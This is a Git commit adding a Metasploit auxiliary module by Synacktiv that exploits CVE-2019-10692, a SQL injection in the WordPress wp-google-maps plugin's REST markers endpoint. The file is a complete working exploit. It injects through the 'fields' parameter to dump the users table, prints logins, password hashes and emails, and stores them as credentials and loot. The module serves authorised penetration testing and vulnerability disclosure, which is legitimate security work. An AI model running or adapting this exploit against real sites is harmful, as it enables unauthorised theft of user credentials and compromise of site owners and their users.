Create wp_google_maps_sql_injection.rb

master
Synacktiv 2019-04-08 10:50:41 +02:00 committed by GitHub
parent b2be6bb75c
commit ab1926b7ee
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 102 additions and 0 deletions

View File

@ -0,0 +1,102 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HTTP::Wordpress
def initialize(info = {})
super(
'Name' => 'WordPress Google Maps Plugin SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability in the a REST endpoint
registered by the WordPress plugin wp-google-maps between 7.11.00 and
7.11.17 (included).
As the table prefix can be changed by administrators, set DB_PREFIX
accordingly.
},
'Author' =>
[
'Thomas Chauchefoin (Synacktiv)', # Vulnerability discovery, Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-10692'],
['WPVDB', '9249']
],
'DisclosureDate' => 'Apr 02 2019'
)
register_options(
[
OptString.new('DB_PREFIX', [true, 'WordPress table prefix', 'wp_'])
])
end
def send_sql_request(sql_query)
begin
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/wp-json/wpgmza/v1/markers/'),
'vars_get' => {
'filter' => '{}',
'fields' => sql_query,
}
)
return nil if res.nil? || res.code != 200 || res.body.nil?
res.body
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE => e
vprint_error("#{peer} - The host was unreachable!")
return nil
end
end
def check
if send_sql_request('0xABCDABCD+0xABCDABCD-- -').include? '5764765594'
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Unknown
end
end
def run
credentials = ""
print_status("#{peer} - Trying to retrieve the #{datastore['DB_PREFIX']}users table...")
# Commas can't be used in the injection, so fetch all the columns
res = send_sql_request("* from #{datastore['DB_PREFIX']}users-- -")
if res == '[]'
print_error("#{peer} - Failed to retrieve the table #{datastore['DB_PREFIX']}users")
else
body = JSON.parse(res)
body.each do |user|
print_good("#{peer} - Found #{user['user_login']} #{user['user_pass']} #{user['user_email']}")
connection_details = {
module_fullname: self.fullname,
username: user['user_login'],
private_data: user['user_pass'],
private_type: :nonreplayable_hash,
status: Metasploit::Model::Login::Status::UNTRIED,
proof: user['user_email']
}.merge(service_details)
create_credential(connection_details)
credentials << "#{user['user_login']},#{user['user_pass']},#{user['user_email']}\n"
end
end
unless credentials.empty?
loot = store_loot("wp_google_maps.http","text/plain", rhost, credentials)
print_good("Credentials saved in: #{loot}")
end
end
end